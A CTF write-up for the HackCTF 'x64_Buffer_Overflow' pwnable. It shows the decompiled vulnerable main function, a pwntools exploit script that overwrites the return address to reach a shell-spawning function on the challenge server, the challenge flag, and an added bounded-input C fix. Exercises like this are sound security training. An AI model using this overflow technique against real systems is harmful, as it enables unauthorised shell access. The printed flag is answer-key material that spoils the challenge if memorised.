[HackCTF / pwnable] x64_Buffer_Overflow
2019. 10. 4. 04:16ㆍWargame & CTF/HackCTF
This is a 64-bit buffer overflow challenge.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+10h] [rbp-110h]
  int v5; // [rsp+11Ch] [rbp-4h]

  _isoc99_scanf("%s", &s, envp);
  v5 = strlen(&s);
  printf("Hello %s\n", &s, argv);
  return 0;
}
```
```c
int callMeMaybe()
{
  char *path; // [rsp+0h] [rbp-20h]
  const char *v2; // [rsp+8h] [rbp-18h]
  __int64 v3; // [rsp+10h] [rbp-10h]

  path = "/bin/bash";
  v2 = "-p";
  v3 = 0LL;
  return execve("/bin/bash", &path, 0LL);
}
```
Calling callMeMaybe spawns a shell, so overwriting the return address (ret) with the address of callMeMaybe will give us a shell.
ex.py
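```python
from pwn import *

e = ELF("./64bof_basic")
#p = process("./64bof_basic")
p = remote("ctf.j0n9hyun.xyz", 3004)

# pwntools on Python 3 works with bytes, so build the payload as bytes
payload = b""
# s starts at rbp-0x110: 0x110 bytes reach rbp, 0x8 more cover the saved rbp
payload += b"A"*(0x110+0x8)
# the next 8 bytes land on the return address
payload += p64(e.symbols["callMeMaybe"])

p.sendline(payload)

p.interactive()
```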
x64_Buffer_Overflow : HackCTF{64b17_b0f_15_51mpl3_700}
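The root cause in main is the unbounded `scanf("%s", &s)`. The following is an added example, not part of the original post or the challenge binary: a bounded token reader in C that rejects oversized input instead of writing past the buffer. The names `read_token`, `read_token_from_string` and `NAME_CAP` are hypothetical, and the 0x10C size is an assumption inferred from the decompiler's stack offsets for `s` and `v5`.

```c
#include <ctype.h>
#include <stdio.h>

#define NAME_CAP 0x10C /* assumed: s at rbp-0x110, v5 at rbp-0x4, 0x10C bytes apart */

/* Read one whitespace-delimited token, as %s does, writing at most cap bytes
 * (including the NUL). Returns the token length, -1 if the token did not fit
 * (it is drained and rejected, not truncated), or -2 if there was no input. */
int read_token(FILE *in, char *buf, size_t cap)
{
    int c;
    size_t n = 0;
    if (cap == 0) return -2;
    buf[0] = '\0';
    while ((c = fgetc(in)) != EOF && isspace(c))
        ;                              /* skip leading whitespace */
    if (c == EOF) return -2;
    do {
        if (n + 1 >= cap) {            /* no room for this byte plus the NUL */
            while ((c = fgetc(in)) != EOF && !isspace(c))
                ;                      /* drain the rest of the oversized token */
            buf[0] = '\0';
            return -1;
        }
        buf[n++] = (char)c;
    } while ((c = fgetc(in)) != EOF && !isspace(c));
    buf[n] = '\0';
    return (int)n;
}

/* Helper for trying constructed inputs: feeds a string through a temp file. */
int read_token_from_string(const char *input, char *buf, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL) return -3;
    fputs(input, f);
    rewind(f);
    int r = read_token(f, buf, cap);
    fclose(f);
    return r;
}

int main(void)
{
    char s[NAME_CAP];
    if (read_token(stdin, s, sizeof s) < 0) { fputs("bad input\n", stderr); return 1; }
    printf("Hello %s\n", s);
    return 0;
}
```

With this reader, input longer than the buffer is refused before any byte reaches the saved rbp or the return address.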